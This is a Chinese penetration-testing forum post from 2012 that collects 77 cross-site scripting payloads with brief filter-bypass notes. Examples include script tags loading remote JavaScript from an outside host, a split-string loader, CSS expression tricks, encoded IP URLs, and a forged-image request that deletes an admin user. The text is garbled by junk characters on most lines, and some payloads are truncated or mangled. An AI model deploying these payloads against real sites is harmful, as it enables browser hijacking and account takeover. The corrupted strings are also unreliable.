中国网络渗透测试联盟

标题: xss跨站脚本攻击汇总 [打印本页]
作者: admin    时间: 2012-9-5 14:56
标题: xss跨站脚本攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。1 z0 t1 M( u! s' \
/ X$ q2 v, ?! A& M
(1)普通的XSS JavaScript注入' E' A8 d. W4 H* H  m3 O1 X# a
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' }$ ?! u/ T# j' q7 \$ C7 m( U
/ ]9 b! C8 f: t# Z9 I/ I (2)IMG标签XSS使用JavaScript命令1 f/ |' w% {' q; t' d
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 W1 W( x  _! ~
/ g6 ^- I7 B* o' t (3)IMG标签无分号无引号+ u* Q" f# A. r* H  \3 q6 @# n" r
<IMG SRC=javascript:alert(‘XSS’)>* y- I; o* F  J" z" o: c
- }) C  M- S# ^
(4)IMG标签大小写不敏感1 T- j5 b% J; B% i8 h/ z
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>0 Y, X/ ~. A. H$ S4 F2 J
" ]; P2 D4 s: R
(5)HTML编码(必须有分号)
! f6 a& b3 Q* P/ f: N+ {% K2 ~& d9 v <IMG SRC=javascript:alert(“XSS”)>" X: @5 s. e, V
2 q, F% H% Y! A+ z: z5 X; `: ~: u
(6)修正缺陷IMG标签. B7 s: f( V3 Z- ]/ s
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
" @( j% l0 n! [! e( q0 B' t8 i1 u& H) e- n
(7)formCharCode标签(计算器)
- d# e8 f* K. s* _: t# u2 c+ S <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
' H: a% u; {8 C$ A9 f
) M7 t8 W" @. @" I% b% I; N' U (8)UTF-8的Unicode编码(计算器)& c( j- w5 T, a# N$ n+ V
<IMG SRC=jav..省略..S')>
0 o& n8 T) G/ n% D% H% a; O4 D
0 N& h# G4 Y! u: k" O (9)7位的UTF-8的Unicode编码是没有分号的(计算器)" a  C7 u/ s4 g4 _
<IMG SRC=jav..省略..S')>
+ N5 m( L9 V- g+ e" q9 J
% f3 w4 t5 X  R$ w% X/ |& @  X (10)十六进制编码也是没有分号(计算器)
4 u' V! g( G7 d& [) }% f <IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
  M& y' ]/ K. t! ~9 @1 ^4 s' A' J% m" N
(11)嵌入式标签,将Javascript分开9 {* h" C: [% t( Z2 ^% a
<IMG SRC=”jav ascript:alert(‘XSS’);”>$ r; {, Y9 m- s  j% j- k1 a' m
* u: k8 X4 t6 F0 e& ]1 v
(12)嵌入式编码标签,将Javascript分开
/ h0 n$ K4 O. v/ \ <IMG SRC=”jav ascript:alert(‘XSS’);”>
: m; J$ S! C0 S. i( ]$ L  F* Z' T+ M$ p  f. W9 W0 }
(13)嵌入式换行符2 {1 o8 p2 v( d; A
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ e# K# `5 p/ u& P" V! |4 b$ x* n2 Y/ s+ z! N( X
(14)嵌入式回车2 H& i* _3 A9 @& Q
<IMG SRC=”jav ascript:alert(‘XSS’);”>; k! g, i! G% P! X) T4 q
+ N4 P6 P) {. U
(15)嵌入式多行注入JavaScript,这是XSS极端的例子/ i$ r: l) g5 t: S5 Z
<IMG SRC=”javascript:alert(‘XSS‘)”>
% g! U0 x3 s: i9 I7 |  s7 \
, h' k% l) x# u (16)解决限制字符(要求同页面)
9 `# _' \% X) |7 I <script>z=’document.’</script>1 U' a0 P+ \4 y, {- o+ S
<script>z=z+’write(“‘</script>- ~' U3 d* Q- s; [8 s! L& ]
<script>z=z+’<script’</script>) Z* w4 R7 Z7 d4 s8 k3 [! [
<script>z=z+’ src=ht’</script>
2 S/ ^- J" [3 g$ l4 D$ B <script>z=z+’tp://ww’</script>
5 g# [7 c9 `+ W) O# T% I8 _ <script>z=z+’w.shell’</script># F6 e  r0 }0 r, d" l; ?
<script>z=z+’.net/1.’</script>
- g9 n$ Z1 P5 Q <script>z=z+’js></sc’</script>% r1 O9 ]& j' J6 }% {
<script>z=z+’ript>”)’</script>
- F! w5 \: `; X4 C% w1 J# W8 i <script>eval_r(z)</script>* T' T) z- }" x& {5 H
# `* E" i, x  p2 `  |5 X  g
(17)空字符
1 O6 g7 c0 w( Z$ g; n1 x6 W" n! M perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
+ G; b" j' r3 }8 h4 b, n: S3 ]2 |
# i  {' S- K! S! z9 t/ {" [9 B (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用2 I- x! \+ K4 q3 C4 g, l0 ~: }
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out7 H& L9 r9 Q4 m  v/ J

8 l5 }; [4 g) P) O (19)Spaces和meta前的IMG标签5 p; y* P6 I+ S! ~
<IMG SRC=”   javascript:alert(‘XSS’);”>
, X  x$ Z& j4 [* k3 d* ~2 L
& F, Q; |2 ^( l" m" ^ (20)Non-alpha-non-digit XSS
( x- c8 Q; R  w% |8 t8 x$ E" [ <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ h5 Q, m+ w, B% a4 i8 x4 o6 d& ^( J+ z
(21)Non-alpha-non-digit XSS to 25 U0 n- I; @% }7 C
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>- [- x/ j2 t& I" S+ e/ g) n
! n; K& }5 F) S0 x) q: f
(22)Non-alpha-non-digit XSS to 3
) d0 \" X0 ]& Z3 g <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>) y3 q$ ?1 A, N# @

& ]5 \, N7 D' A5 u/ g/ } (23)双开括号4 i4 _7 K3 A- T  ]- v
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 ]4 H3 n5 Y1 j3 g
' N; @) i+ c. c7 y: T5 s0 k* o' { (24)无结束脚本标记(仅火狐等浏览器)8 d# z9 Y: z$ t: f4 L# ?3 |
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>. j( b) o/ r/ r( z) B; c- Y( r

* v8 e3 T7 h5 [$ d" [ (25)无结束脚本标记29 k& u+ W6 C8 ^: b
<SCRIPT SRC=//3w.org/XSS/xss.js>
: R/ {: ?. S9 A+ b1 r* l1 c3 ], L! z  o& A
(26)半开的HTML/JavaScript XSS
) u# b; Z/ D; B. b; M( l <IMG SRC=”javascript:alert(‘XSS’)”0 t, b7 F8 W; E

; h6 n' ?3 @, D (27)双开角括号
# H% q+ u1 I2 z! H8 D' V <iframe src=http://3w.org/XSS.html <) Z$ G  m" ^  d" c! V
% A7 J) q9 O, v3 d' X9 F* j
(28)无单引号 双引号 分号: c+ t2 \' F, c( p' Z5 R
<SCRIPT>a=/XSS/5 @* ]: z* I; I6 E8 A& K
alert(a.source)</SCRIPT>1 v, Z; j, U5 d) ]# _& B
9 ~. u9 |9 O9 K
(29)换码过滤的JavaScript# d+ e8 v0 O' \, z* ^. U2 r
\”;alert(‘XSS’);//
, I  E! ^( k# s+ _3 S; A! `, i: T" x# z
(30)结束Title标签  B, t  Z. b8 Z5 o4 a
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
) K+ d% j1 `5 N) S0 p+ f* s3 ~" I% b$ Y
(31)Input Image
: Z! @& p. E; A7 _3 o <INPUT SRC=”javascript:alert(‘XSS’);”>
8 P; B. G6 l! q( r, a* P/ O* R9 b, J- q0 B; f  T
(32)BODY Image. g6 e" F, M8 C3 U9 c
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>7 `  O9 D. w  z

6 E3 r" ?9 [( } (33)BODY标签
; L) b: F; P0 b9 @& @: c <BODY(‘XSS’)>
% ?" k/ @2 i4 }: D. j8 l$ {' f
(34)IMG Dynsrc2 J! e5 |% I3 `
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
( d) x6 _1 Z% a& R6 T) n) }1 s: ?* d- Y% w. \: X3 @/ I
(35)IMG Lowsrc
$ R: y' }7 Q/ Q% E" f# J4 F <IMG LOWSRC=”javascript:alert(‘XSS’)”>
  K4 C- n6 A3 n2 y3 U1 i; Y# i
& g% A7 D3 f  I (36)BGSOUND
1 u, W0 [( L0 l- g, ^* G( ^: {, l <BGSOUND SRC=”javascript:alert(‘XSS’);”>
' o' A/ n4 K/ N
7 H$ E/ P: ^5 W (37)STYLE sheet
4 v0 ]  @, T7 Z2 ?4 v; L <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
% E" t& T- o0 X! r! S, V9 G; d8 f- i* F! ^: T8 ?6 q
(38)远程样式表- U( i" o9 ]3 N. j- E8 R
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
* B4 ^& C8 k+ ?. t+ }( f1 q; V; [9 t
(39)List-style-image(列表式)9 i  W& P) E% ?' \, B
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; R6 i+ c! B! J4 H6 m$ V
- j% |' @0 q. T6 ?* E2 ~( i0 M (40)IMG VBscript
. ~9 \: V* D. S; P/ U6 } <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS2 i% Q/ M" g% ]# s& k  m

9 i& E  l: a6 F2 @ (41)META链接url( s7 c6 |- f" j' {$ y
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>/ ^. Q2 t( p7 k! c8 y) k2 o
+ Z* q7 p. b4 \8 W+ D  Y
(42)Iframe
6 E; G* B6 G/ p' S <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>' A+ B8 j. X. c$ D% M6 l: C1 R

/ `5 e/ X# x1 Q( }, Y (43)Frame
  l) e8 o3 o3 A* q% b2 ^ <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
8 F2 d0 D# O) c) B9 J& ^1 i) Q3 C4 v5 p- j3 b* N+ ]
(44)Table
3 t& a8 d# W) D2 O4 _: f) D <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 `/ Y6 i" S6 I# U% B3 d& A2 ]
- f  I1 ?" d* o: ~  w) K (45)TD8 X, a9 w7 C7 w) x2 c$ r
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
7 }1 o' ~& c; y; K
! F/ Z9 |( W. Q) H( O (46)DIV background-image+ o9 n- s! `3 F) ]
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
' Y3 t* B2 m, b5 r  _; M( ]: ~+ n/ c7 A/ U; K1 b+ s% G& q& U* s
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)3 W4 H  n0 R( s; X" m: s- x8 U
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ W2 G1 E1 h* `3 y: n- Y: B! I1 E. k. n
(48)DIV expression
3 g1 u: }# g+ S5 m! Z <DIV STYLE=”width: expression_r(alert(‘XSS’));”># Q" Y" M4 z# ?  z7 U9 r

3 `2 T6 U3 Z' j+ L% P: l6 z (49)STYLE属性分拆表达
' A* u/ O& o" o$ r1 ~9 ? <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
& f- g! k0 W1 W. }% N/ d! I. U) _" `. P8 b: A1 v9 f! ]
(50)匿名STYLE(组成:开角号和一个字母开头)
: H/ V9 B9 ]* W  h" k <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; F4 \* w8 D' a' G' p  M  C: a: g+ A- f3 Z5 I3 G/ H8 v
(51)STYLE background-image8 K, D* I3 y5 m' u5 t+ x
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
) p$ z! p1 I* y" E  P& w, Q% c% J. H( E3 w+ |  t; }1 {
(52)IMG STYLE方式
& C$ h3 S& {3 h7 N1 P( X4 F exppression(alert(“XSS”))’>" ~  o  ?. Y4 Y  I) A$ z

2 }, o5 O6 x- k1 j8 d6 ` (53)STYLE background, E) d" l$ `4 \. N% B
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
9 a4 q* }7 `: [# V% q
3 }; u2 H# C, ^ (54)BASE5 G2 e% F8 k  s4 ?! n; `' Y
<BASE HREF=”javascript:alert(‘XSS’);//”>
) |4 j- P" s9 o! o+ C' W+ C. ]) H0 W6 v7 \+ W# T; {  |1 F
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
  T! t  K1 i$ Y! t2 e; a5 c% ], P! E <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>) e7 T( H! I. `& r5 H$ I

, ^: F5 m$ ~* U (56)在flash中使用ActionScrpt可以混进你XSS的代码" {5 j  e; j$ q: K
a=”get”;. E% o. M2 T0 ^1 q: ]
b=”URL(\”";
9 X2 c$ I6 N3 z' }0 H* d c=”javascript:”;5 d  k! k; W# R& a& \- A
d=”alert(‘XSS’);\”)”;6 Y" A2 W4 o6 }* J, g
eval_r(a+b+c+d);
; N) Z# H# H8 P2 y- D- I) L" j" ?! r4 ?) @3 c1 w7 {
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上6 p  o% a" ^" V
<HTML xmlns:xss>9 a& [6 i' n; h' W
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
( N$ M4 h! l0 Z* f$ ~ <xss:xss>XSS</xss:xss>1 i  G: Z+ ?  _4 y4 h
</HTML>' D9 c) Z$ m6 d' M4 c" x' T; F

/ C: t' [% k& Q (58)如果过滤了你的JS你可以在图片里添加JS代码来利用$ p5 Z) O* D8 h" B0 w/ z2 J
<SCRIPT SRC=””></SCRIPT>
/ V( P4 T6 J" W; Z8 K$ a: e' x5 Q- z, T3 f8 Z
(59)IMG嵌入式命令,可执行任意命令
2 A5 O" x+ q5 R! z2 E <IMG SRC=”http://www.XXX.com/a.php?a=b”>3 }3 Y: E& i  R; _5 b
8 E6 c; J  _1 Q/ z( R$ c
(60)IMG嵌入式命令(a.jpg在同服务器)' A  z4 @$ K( b5 [
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser+ H* h" Z3 p: M1 X8 M& C1 }

+ Z+ d" d2 Q6 A/ {/ [% o (61)绕符号过滤2 D- Z6 y+ g- N# t5 s
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>' E7 V3 P5 r5 Z
8 X' z5 c* a( \6 Q
(62)
) Q0 f: b3 Z7 ]7 r4 b2 H+ F, U0 a <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 w: a) V4 `6 e6 h

% N' k5 k6 U) Z, \2 e& k (63)+ K4 O% j: C" J8 V# `
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>  _+ i$ X# K" z, s5 w

) t9 e/ H9 s3 j3 S, _6 o) r (64)
+ m# y, o7 n' _% l- u <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>. \. N6 B& p% k, e$ j$ [
2 q: m" N6 H9 G8 |! C! `* I
(65)
  c, S( E! }) _$ H8 m8 g/ B <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>9 E" _& C+ w+ D' v8 \1 g
7 p; k9 ]1 h: ~' s8 A# g! B/ S
(66)
' N& U0 C+ ^( q3 `) t) \1 V <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
" L  V9 Z% N  W) S# j5 [# h0 O3 m. Z
(67)
9 Y( f, p% g' W- |8 r <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>* X# `. M7 I. o& l% O- N* Z( [
% F) M- \1 p8 P& z6 {. u5 ~
(68)URL绕行
+ S  U3 ?' Y3 m. {' [1 Z <A HREF=”http://127.0.0.1/”>XSS</A>
1 P% F  w/ @/ ^$ e) Q: t
  ^9 L9 r# O; K$ V+ R' U1 b (69)URL编码; z. Y! h2 }6 s& n: L
<A HREF=”http://3w.org”>XSS</A>! U  y2 q7 k/ O

3 x. k; ?( |7 r* p2 Z  Y; [6 U" }; B (70)IP十进制+ t! i" f7 n7 Z/ c0 y# g
<A HREF=”http://3232235521″>XSS</A>+ E% S* ?3 w( g/ e

8 b6 h8 g- F  G) s: l (71)IP十六进制
/ z6 ]' u, u! b6 l  N* w <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
- w$ K3 V+ j0 ^! y' r# j3 r+ }
( ~. K: r2 ]! L6 B (72)IP八进制  A0 `' p2 ^) w' ]5 k3 ?
<A HREF=”http://0300.0250.0000.0001″>XSS</A>: u# T8 o# C6 C& `6 b; s

8 ~9 G0 Z+ Z$ N. \3 K+ m (73)混合编码
  \$ g- n  g$ l! _% z. h! Y <A HREF=”h
, H% I; A  m% P9 V tt p://6 6.000146.0×7.147/”">XSS</A>: P7 w  z5 w5 t- m( p- U: ?+ n

9 Z5 ]* [! g, S4 s (74)节省[http:]: l2 Y* x8 a+ J& a" V9 i
<A HREF=”//www.google.com/”>XSS</A>
! S5 Y& H" J7 r. t; {1 H
  c" M) G! E8 z: S4 R (75)节省[www]
( Z- B; {( T. l" ~0 y <A HREF=”http://google.com/”>XSS</A>3 v4 D: C6 Y6 G/ r2 D
8 y+ Z- L% c6 z; D# E
(76)绝对点绝对DNS
1 P" ?' @- B) Q$ u$ |' D <A HREF=”http://www.google.com./”>XSS</A>/ I6 `/ J0 T5 X6 s3 `

7 G; T& y2 H2 T (77)javascript链接
# w& a4 L. _7 v" Y <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2